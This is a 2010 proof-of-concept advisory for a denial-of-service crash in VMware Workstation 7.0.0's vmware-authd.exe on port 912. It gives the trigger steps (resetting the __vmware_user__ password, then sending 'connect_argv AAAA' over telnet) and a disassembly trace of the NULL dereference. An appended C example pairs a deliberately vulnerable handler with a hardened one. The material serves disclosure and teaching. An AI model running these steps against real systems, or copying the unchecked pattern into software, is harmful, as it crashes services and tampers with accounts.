7/16/2010

VMWare Workstation 7.0.0 build-203739 vmware-authd.exe DoS PoC

Exploit Title: VMWare-authd.exe DoS
Date: 16.07.2010
Software Link: http://vmware.com
Version: VMWare Workstation 7.0.0 build-203739
Platform / Tested on: Windows 7 Release Candidate

The unhandled exception arises while processing input data sent to port 912. Beforehand, you must reset the password for __vmware_user__.

Example:
Launch cmd.exe with admin privileges:
> net user __vmware_user__ NEW_PASS
> telnet 127.0.0.1 912
telnet> user __vmware_user__
telnet> pass NEW_PASS
telnet> connect_argv AAAA

After that, the connection will be aborted.
Here is the debug session:

text:00407378 lea eax, [ebp+ppSZ] ;(==0)
text:0040737B push eax
text:0040737C lea ecx, [ebp+var_C]
text:0040737F push ecx
text:00407380 lea edx, [ebp+Memory]
text:00407383 push edx
text:00407384 lea eax, [ebp+pCmd] ; "connect_argv\x20\x20AAAA\x00\x0A"
text:0040738A push eax
text:0040738B mov [ebp+var_1], 0
text:0040738F call vm_authd_CheckArgs_CONNECT_ARGV
text:00407394 mov esi, [ebp+var_C]
text:00407397 mov ebx, [ebp+ppSZ] ; is NULL.
...
text:0040745D mov eax, [ebx] ; (ebx == 0) => APPCRASH
text:0040745F push eax ; Memory
text:00407460 call esi ; free
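
The pattern in the trace above (an out-parameter left NULL by the argument parser, then dereferenced on the free path), shown as a vulnerable caller beside a hardened one. This is an added example, not VMware's code or the author's; the function names and the "key=value" grammar are assumptions made for illustration.

```c
#include <stdlib.h>
#include <string.h>

/* Hypothetical parser, not VMware's code. Assumed grammar for illustration:
 * "connect_argv <key>=<value>". On success *out is a heap array holding one
 * heap string; on failure it returns -1 and *out stays NULL, the state the
 * trace annotates for ppSZ. */
static int parse_connect_argv(const char *cmd, char ***out)
{
    static const char verb[] = "connect_argv ";
    *out = NULL;
    if (strncmp(cmd, verb, sizeof verb - 1) != 0)
        return -1;
    const char *arg = cmd + sizeof verb - 1;
    if (strchr(arg, '=') == NULL)
        return -1;                       /* e.g. "connect_argv AAAA" */
    char **v = calloc(1, sizeof *v);
    if (v == NULL)
        return -1;
    size_t n = strlen(arg) + 1;
    v[0] = malloc(n);
    if (v[0] == NULL) { free(v); return -1; }
    memcpy(v[0], arg, n);
    *out = v;
    return 0;
}

/* Vulnerable shape: the return value is ignored, so argv may be NULL and
 * argv[0] is the same read of address 0 as "mov eax, [ebx]". */
int handle_unchecked(const char *cmd)
{
    char **argv;
    parse_connect_argv(cmd, &argv);
    free(argv[0]);
    free(argv);
    return 0;
}

/* Hardened shape: reject the command before touching the out-parameter. */
int handle_checked(const char *cmd)
{
    char **argv = NULL;
    if (parse_connect_argv(cmd, &argv) != 0 || argv == NULL)
        return -1;                       /* report the error, keep serving */
    free(argv[0]);
    free(argv);
    return 0;
}
```
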
